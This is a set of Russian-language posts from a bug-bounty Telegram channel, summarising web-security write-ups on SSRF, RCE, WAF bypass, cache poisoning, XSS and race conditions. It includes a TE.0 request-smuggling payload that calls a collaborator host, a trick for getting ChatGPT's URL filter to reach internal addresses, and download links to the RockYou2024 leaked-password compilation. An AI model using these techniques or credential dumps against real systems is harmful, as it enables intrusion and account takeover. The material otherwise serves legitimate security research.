В статье описывается интересный случай эксплуатации уязвимости SSRF (Server-Side Request Forgery), который затронул как серверную, так и клиентскую стороны и позволил проникнуть во внутренние сети, а также получить доступ к конфиденциальной информации
Ссылка на статью
#web #ssrf #csrf
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Эксплуатация двусторонней SSRF с воздействием на сервер и клиента
Как нож с двумя лезвиями, это история о двусторонней уязвимости SSRF (Server-Side Request Forgery), которую удалось успешно использовать, чтобы продемонстрировать воздействие как на сервер, так и на клиента, что не часто встречается, по крайней мере в моем…
🔥17👍4
В статье описывается пошаговый процесс поиска RCE, начиная со сбора интересных активов и сканирования портов, и заканчивая тестированием различных эксплойтов и проверкой эндпоинтов. Автор также рассказывает о своих неудачах и успехах, приводя пример того, как настойчивость, упорство и немного удачи привели к успешному обнаружению серьезной уязвимости.
Ссылка на статью
#web #rce #struts
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Как был найден RCE в одной из публичных программ на Bugcrowd
Всем привет, cегодня я расскажу, как получил RCE на одной из публичных программ Bugcrowd. Выбирая программу для взлома, я всегда обращаю внимание на программы с широким скоупом, так как они дают мне большую свободу для поиска активов, которые соответствуют…
👍26
На ютубе появляются доклады с прошедшего PHDays 2 и вот вам некоторые из них:
Выступление, посвященное различным уязвимостям и методам взлома на платформах для обучения хакеров.
Про то, как бизнес-логика может предполагать срабатывание инъекций через несколько этапов и запросов, и показывает инструменты для работы с такими инъекциями.
Про уязвимости внедрение кода в современной электронной почте.
Про поиск уязвимостей в отечественных CMS и пополнение БДУ новыми уязвимостями.
Основы эксплуатации XXE и защиты (или ее отсутствии) от этой уязвимости в разных фреймворках, с примерами уязвимого кода из open-source-проектов.
Про разработку статического анализатора клиентского JavaScript-кода для обнаружения серверных HTTP-эндпоинтов.
Еще больше крутых выступлений смотрите на ютуб по ссылке ниже.
Ссылка на плейлист
#learn #web #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥6
Forwarded from Proxy Bar
Доброй ночи.
Написал небольшуюкнижку\руководство для начинающих взломщиков Linux.
Сей труд навеян вечным вопросом "Подскажите с чего начать?".
На какую то уникальность не претендую, но надеюсь кому то окажется полезным.
За вычитку благодарю uberhahn
Ну и с первым днем лета и днем защиты детей )
Само руководство book.proxy-bar.org
#book #linux #hex
Написал небольшую
Сей труд навеян вечным вопросом "Подскажите с чего начать?".
На какую то уникальность не претендую, но надеюсь кому то окажется полезным.
За вычитку благодарю uberhahn
Ну и с первым днем лета и днем защиты детей )
Само руководство book.proxy-bar.org
#book #linux #hex
👍29🔥3😁2🤯1
Недавно нашел новый ресурс, под названием RSECloud, который позволяет собирать поддомены и IP'шники организации по домену или имени организации. Работает как в вебе, так и через API.
Чтобы удобно прикрутить его к своей автоматизации накидал небольшой скрипт на GO, который предполагает 3 варианта использования:
Сбор поддоменов:
rsescan -d example.com -key YOUR_API_KEY
Сбор IP'шников по домену:
rsescan -d example.com -cn -key YOUR_API_KEY
Сбор IP'шников по имени организации:
rsescan -so "Organization Name" -key YOUR_API_KEY
Для получения API ключа нужно просто пройти регистрацию по почте. Для всех желающих залил скрипт на гитхаб.
Ссылка на RSECloud
Ссылка на скрипт
#web #recon
Please open Telegram to view this post
VIEW IN TELEGRAM
👍28🔥6🤯1
This media is not supported in your browser
VIEW IN TELEGRAM
Ранее я уже рассказывал о том, что для HTTP-запросов, содержащих тело запроса (например, POST, PUT, PATCH и т.д.), часто можно обойти WAF, просто добавив мусорные данные в начало запроса. Когда запрос дополняется этими ненужными данными, WAF обработает до X КБ запроса и проанализирует его, но все, что превышает пределы WAF, пройдет мимо.
На недавнем NahamCon вышел целый доклад на эту тему с подробным разбором и необходимыми значениями X КБ для обхода различных популярных WAF. Видео доклада, описание и расширение для вставки мусорных данных в Burp представлено по ссылкам ниже.
Ссылка на видео
Ссылка на GitHub
#web #waf #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20🔥11😢1
SHADOW:Group
🥇 Pentest Award возвращается Ребята из Awillix анонсировали прием заявок на ежегодную премию для пентестеров - Pentest Award. Вы можете громко заявить о своих достижениях, показать свой вклад в развитие российского рынка ИБ и обменяться лучшими историями…
Кстати, на днях согласовал с вендором публикацию рассказа об одном из отчетов, чтобы закинуть заявку на Pentest Award. В итоге статья увидела свет и была отправлена, хоть и в довольно урезанном виде. Если тоже хотите поучаствовать, чтобы выиграть призы или просто поделиться с комьюнити своими интересными находками, то у вас еще есть время до 23.06.
🔥15👍2🤯1
Forwarded from OFFZONE
This media is not supported in your browser
VIEW IN TELEGRAM
Пятый OFFZONE пройдет 22–23 августа в Москве, в Культурном центре ЗИЛ.
В этом году у нас еще больше зон для выступлений: добавились AI.Zone и Threat.Zone.
Ждем доклады на самые разные темы: open-source, применение AI/ML в кибербезопасности, уязвимости в парсерах, пентест Wi-Fi и не только. Не бойтесь предложить что-то свое :)
Спикеры, которые пройдут отбор, получат: бесплатные проходки на конфу и Speaker party, наш мерч, а также другие плюшки в зависимости от зоны.
Присылайте заявки на доклады до 12 июля.
Узнать больше и подать заявку
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥5😁1🤯1
Очередному исследователю не заплатили и он поделился рассказом о том, что ChatGPT не может получать доступ к определенным веб-сайтам, однако фильтрация некорректно обрабатывает HTTP-перенаправления. Вы можете использовать любой сокращатель ссылок и обойти их проверки.
Более того, это также работает для ссылок типа
https://localhost:<порт для сканирования>/ и внутренних доменов OpenAI.Однако, по мнению компании, это не угроза безопасности.
#web #ssrf
Please open Telegram to view this post
VIEW IN TELEGRAM
👍29😁6🤯2😢1
SHADOW:Group
Кстати, на днях согласовал с вендором публикацию рассказа об одном из отчетов, чтобы закинуть заявку на Pentest Award. В итоге статья увидела свет и была отправлена, хоть и в довольно урезанном виде. Если тоже хотите поучаствовать, чтобы выиграть призы или…
На Pentest Award продлили прием заявок аж до 14 июля. Меньше всего конкуренции в номинации «Ловись рыбка: за самый оригинальный фишинг или попытку засоциалить сотрудников», поэтому, если у вас имеются интересные кейсы, есть высокий шанс оказаться среди номинантов.
👍9🔥2😁1😢1
x-middleware-prefetch приводит к получению пустого объекта JSON {} в качестве ответа. При наличии CDN или системы кэширования этот пустой ответ потенциально может быть кэширован, в зависимости от конфигурации правил кэширования, что делает целевую страницу непрактичной, а ее содержимое недоступным и получается некая разновидность DOS'а через отравление кэша.Rsc: 1, может привести к отравлению кэша и вернет RSC React вместо исходного содержимого. Успешность также зависит от CDN и его правил кэширования.x-invoke-status, непосредственно указанного в запросе и вызвать/вернуть страницу ошибки. Как правило, CDN и системы кэширования настроены так, чтобы не кэшировать коды ошибок HTTP. Однако можно указать код 200 для согласования с правилами кэширования и эффективно “принудительно” кэшировать страницу с ошибкой.Более подробно про каждый из способов, а также некоторые советы
#web #cache #dos
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14🔥5🤯1
Forwarded from Похек (Сергей Зыбнев)
RockYou2024
Архив весит 45 гб
Распакованный 156 гб
Загрузил на свой S3. Скорость не лучшая, но точно не отвалиться загрузка
https://s3.timeweb.cloud/fd51ce25-6f95e3f8-263a-4b13-92af-12bc265adb44/rockyou2024.zip
Яндекс Диск. Тут скорость заметно быстрее
https://disk.yandex.ru/d/1spMBmxcEnN95g
🌚 @poxek
Архив весит 45 гб
Распакованный 156 гб
Загрузил на свой S3. Скорость не лучшая, но точно не отвалиться загрузка
https://s3.timeweb.cloud/fd51ce25-6f95e3f8-263a-4b13-92af-12bc265adb44/rockyou2024.zip
Яндекс Диск. Тут скорость заметно быстрее
https://disk.yandex.ru/d/1spMBmxcEnN95g
Please open Telegram to view this post
VIEW IN TELEGRAM
👍34🤯1
Forwarded from BI.ZONE Bug Bounty
Мы завершили первый этап редизайна платформы и телеграм-канала!
Что нового:
Кстати, платформа переехала и теперь располагается тут — https://bugbounty.bi.zone.
Этот релиз — первый из запланированных. Поэтому расскажите нам о своих пожеланиях и поделитесь идеями, чтобы мы смогли их учесть в следующих обновлениях.
А пока можете изучить платформу ;)
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥4😁3🤔2
Злоумышленник может использовать кодировку символов ISO-2022-JP для внедрения произвольного кода JavaScript на веб-сайтах, где отсутствует информация о кодировке HTML страницы.
Подробнее о том, как это работает и почему может приводить к XSS читайте в блоге по ссылке.
#web #xss
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20
Forwarded from PurpleBear (Vadim Shelest)
TE.0 HTTP Request Smuggling
Новая техника эксплуатации
Суть
Такие нашлись у
Особенности эксплуатации
✅ Значение
✅ 2 EMPTY_LINE_HERE в конце последнего чанка запроса
✅ Использование различных методов при отправке пейлоада (в кейсе с
Новая техника эксплуатации
HTTP Request Smuggling представлена в блоге BugcrowdСуть
TE.0 такая же как у CL.0 только в данном случае фронт принимает, а бэкэнд игнорирует заголовок Transfer-Encoding. Кто бы мог подумать, что в мире найдутся сервера обрабатывающие запрос, который начинается с number + newline😎OPTIONS / HTTP/1.1
Host: {HOST}
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Transfer-Encoding: chunked
Connection: keep-alive
50
GET <http://our-collaborator-server/> HTTP/1.1
x: X
0
EMPTY_LINE_HERE
EMPTY_LINE_HEREТакие нашлись у
GCP load balancer'ов, эксплуатация TE.0 позволила обойти Google IAP (Identity-Aware Proxy) и получить доступ к ресурсам за этой проксей с байпасом механизмов аутентификации и авторизации, за репорт баги Google выплатили исследователям $8.5kОсобенности эксплуатации
TE.0:✅ Значение
chunk length должно быть в hex number в соответствии с HTTP/1.1 RFC✅ 2 EMPTY_LINE_HERE в конце последнего чанка запроса
✅ Использование различных методов при отправке пейлоада (в кейсе с
GCP успешно отработал OPTIONS)Bugcrowd
Unveiling TE.0 HTTP Request Smuggling: Discovering a Critical Vulnerability in Thousands of Google Cloud Websites | @Bugcrowd
We later discovered we had a powerful exploit affecting thousands of Google Cloud-hosted websites that were using their Load Balancer.
👍14🔥6😢1
This media is not supported in your browser
VIEW IN TELEGRAM
🎉 Розыгрыш билетов на OFFZONE
Да свершится великий рандом! Я разыграю ДВА БИЛЕТА на одну из самых ожидаемых конференций года - OFFZONE.
Как принять участие:
- Быть подписанным на канал
- Нажать кнопку "Участвую!" под этим постом
Бот случайным образом выберет двух счастливчиков среди тех, кто выполнит все условия!
Сроки:
Розыгрыш продлится до 29.07.2024, а победители будут объявлены на следующий день.
Не упустите свой шанс стать частью OFFZONE! Удачи всем участникам!
#offzone
Да свершится великий рандом! Я разыграю ДВА БИЛЕТА на одну из самых ожидаемых конференций года - OFFZONE.
Как принять участие:
- Быть подписанным на канал
- Нажать кнопку "Участвую!" под этим постом
Бот случайным образом выберет двух счастливчиков среди тех, кто выполнит все условия!
Сроки:
Розыгрыш продлится до 29.07.2024, а победители будут объявлены на следующий день.
Не упустите свой шанс стать частью OFFZONE! Удачи всем участникам!
#offzone
🔥14👍8
Помните исследование Джеймса Кеттла про Race Condition? В данной статье будет пример реализации данного исследования на практике во время багхантинга и, как итог, захват любого аккаунта на сайте.
Ссылка на статью
#web #race #ato
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Обход аутентификации с помощью Race Condition приводящий к полному захвату учетной записи
Поиск уязвимостей проводился в крупной компании с веб-приложением электронной коммерции, которое позволяло покупать и заказывать различные товары. Внимание было сосредоточено на функциях входа в систему. Механизм входа на этот сайт использует одноразовые…
👍23🔥12